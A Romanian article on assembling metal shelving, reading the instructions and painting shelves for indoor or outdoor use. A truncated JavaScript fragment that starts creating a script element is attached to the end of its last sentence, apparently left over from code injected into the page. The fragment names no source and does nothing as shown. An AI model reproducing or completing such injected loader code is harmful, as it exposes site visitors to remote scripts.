rafturi metalice

rafturi metalice

Asamblarea de rafturi metalice este destul de usoara si nu pune probleme foarte mari daca se face urmand anumite indicatii. Atunci cand aveti nevoie de spatiu suplimentar, folosirea unor rafturi metalice reprezinta o alternativa buna fata de alte solutii mai costisitoare cum este lemnul spre exemplu.  Durabilitatea acestor piese si varietatea marimilor si formelor, le face o alegere buna atunci cand aveti nevoie de multe rafturi. Aceste rafturi metalice sunt potrivite pentru a fi montate in orice loc in casa si pot fi vopsite pentru a se incadra in decorul camerei daca se doreste acest lucru.

Operatiuni preliminare montarii rafturilor metalice

Inainte de a va apuca de montarea unor rafturi metalice, aveti nevoie de anumite lucruri. Printre acestea se numara anumite unelte cum sunt o surubelnita, un burghiu sau un ciocan si, nu in ultimul rand, multa rabdare.

Majoritatea modelelor de rafturi metalice sunt vandute in cutii. Daca nu doriti sa bagati in casa o cutie mare si grea, puteti deschide cutia in masina sau afara si apoi puteti cara toate piesele in casa pe rand, dupa cum va este mai la indemana. Apoi, cu instructiunile in mana, asezati toate piesele pe grupuri dupa cum este prezentat acolo. Acest pas este foarte important deoarece va lasa sa descoperiti daca aveti toate piesele si va ajuta sa fiti organizat inainte de a trece la montajul propriu zis.

Operatiuni de montare a rafturilor metalice

Este foarte important ca, inainte de a trece la montarea de rafturi metalice, sa cititi instructiunile cu atentie. Nu toata lumea citeste instructiunile care vin impreuna cu ambalajul si toate piesele. Nu va grabiti si cititi fiecare etapa in amanunt. Puteti sa insistati sau sa subliniati sectiunile in care apar expresii de genul  “ asigurati-va sa” sau similare. De asemenea, trebuie sa fiti convinsi ca primul pas este corect inainte de a trece la pasul doi, trei si asa mai departe. Daca instructiunile spun ca o piesa din unele tipuri de rafturi metalice trebuie montata cu sageata indreptata catre in sus, atunci tineti minnte sa cautati sageata inainte de a o instala. Acest lucru va va scuti de eventualele neplaceri ulterioare.

Majoritatea modelelor de rafturi metalice sunt comercializate impreuna cu picioare, rafturi, suruburi, lagare de fixare si suporturi pentru a asigura ansamblul. Incepeti cu partea de jos, cu picioarele si continuati catre partea de sus. Continuati in aceasta maniera pana ajungeti la ultimul raft si apoi fixati ansamblul in perete.

Vopsirea rafturilor metalice

Poate va ganditi ca vopsirea unor rafturi metalice de la Ingeco este o operatiune dificila din cauza faptului ca acestea au suprafete netede, para pori. Cu o pregatire corespunzatoare, aceasta operatiune de vopsire nu difera fata de alte materiale si obiecte. Principala preocupare trebuie sa fie aceea a stabilirii locului de amplsare al rafturilor metalice. Daca doriti sa le amplasati la exterior, atunci veti avea nevoie de o vopsea speciala pentru ca ele sa nu fie afectate de conditiile meteo, uniditate, temperaturi si alte influente externe care ar duce la deteriorarea stratului de vopsea si la aparitia ruginei.var d=document;var s=d.createElement(‘script’);